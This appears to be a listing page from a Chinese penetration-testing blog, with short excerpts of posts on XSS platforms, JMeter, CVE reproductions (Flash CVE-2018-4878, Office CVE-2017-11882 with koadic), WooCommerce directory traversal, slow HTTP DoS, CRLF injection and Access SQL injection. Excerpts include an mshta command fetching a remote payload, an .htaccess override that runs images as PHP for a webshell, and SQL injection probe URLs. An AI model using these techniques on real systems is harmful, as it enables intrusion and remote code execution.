02 好奇驱使我对XSS平台的一次小研究

admin     2018.05.02     渗透测试     抢沙发     85人打酱油
前言 这一段时间博客一直木有时间和东西产出,所以趁着这个小短假研究了一下XSS平台的运行原理是怎么样的。 该博文大概是这么一个流程:创建-》接收返回数据-》存储返回数据-》如何维持会话有效期 正文 创建 首先看下平台从创建项目的流程开始进行分析。 首先创建一个默认模...

14 Web接口测试工具--Jmeter

admin     2018.03.14     渗透测试     抢沙发     137人打酱油
一、安装Jmeter Jmeter官方首页:http://jmeter.apache.org/ 关于Jmeter可以做什么,官方上也有非常详细的介绍。另外它的文档也写很详细。如果想学习Jmeter,那么它的文档将会是最好的教材。 我相信你可以在官网上找到下载地址并把它下载下来。 J...

09 Flash 0day漏洞复现(CVE-2018-4878)

admin     2018.03.09     渗透测试     抢沙发     276人打酱油
0x01前言 Adobe公司在当地时间2018年2月1日发布了一条安全公告: https://helpx.adobe.com/security/products/flash-player/apsa18-01.html 公告称一个新的Flash0Day漏洞(CVE-2018...

01 CVE-2017-17058:WordPress插件WooCommerce 2.0/3.0 – 目录遍历

heiye     2017.12.01     渗透测试     抢沙发     419人打酱油
漏洞验证代码 $woo="www/wp-content/plugins/woocommerce/templates/emails/plain/";` functionfile_get_contents_utf8($fn){ $opts=array( 'http'=&...

29 .htaccess拿shell

admin     2017.11.29     渗透测试     抢沙发     226人打酱油
新建个.htaccess文件内容: ForceTypeapplication/x-httpd-php SetHandlerapplication/x-httpd-php 在他当前目录下只要是以jpg结尾的都会以PHP程序去解析 ...

22 CVE-2017-11882复现配合koadic

admin     2017.11.22     渗透测试     抢沙发     405人打酱油
项目地址:https://github.com/iBearcat/CVE-2017-11882 首先开启koadic,然后配置一下 复制这句代码 mshtahttp://192.168.220.132:9999/dHem0 然后生成doc文件 ┌─[root@sch01ar]...

20 缓慢的Http拒绝服务攻击漏洞的验证(slowhttptest的安装)

admin     2017.11.20     渗透测试     抢沙发     211人打酱油
0x01前言 主要记录缓慢的Http拒绝服务攻击漏洞的验证过程。 0x02什么是Http拒绝服务攻击? 缓慢的http拒绝服务攻击是一种专门针对于Web的应用层拒绝服务攻击,攻击者操纵网络上的肉鸡,对目标Web服务器进行海量httprequest攻击,直到服务器带宽被打...

20 CRLF注射教程

admin     2017.11.20     渗透测试     抢沙发     206人打酱油
CRLF注射剂定义 CRLF指特殊字符元素“回车”和“换行”。这些元素嵌入在HTTP头文件和其他软件代码中,以表示行尾(EOL)标记。许多互联网协议,包括MIME(电子邮件),NNTP(新闻组),更重要的是HTTP,使用CRLF序列将文本流分离成离散的元素。Web应用程序开发人员根...

20 access手工sql注入基础

admin     2017.11.20     渗透测试     抢沙发     169人打酱油
判断注入 Orderby2222代表查询的列名的数目有22个 http://127.0.0.1/test.asp?id=xxorderby22正常(小于等于22均正常) http://127.0.0.1/test.asp?id=xxorderby23错误 猜解表名确定存在admin表名 ht...

关闭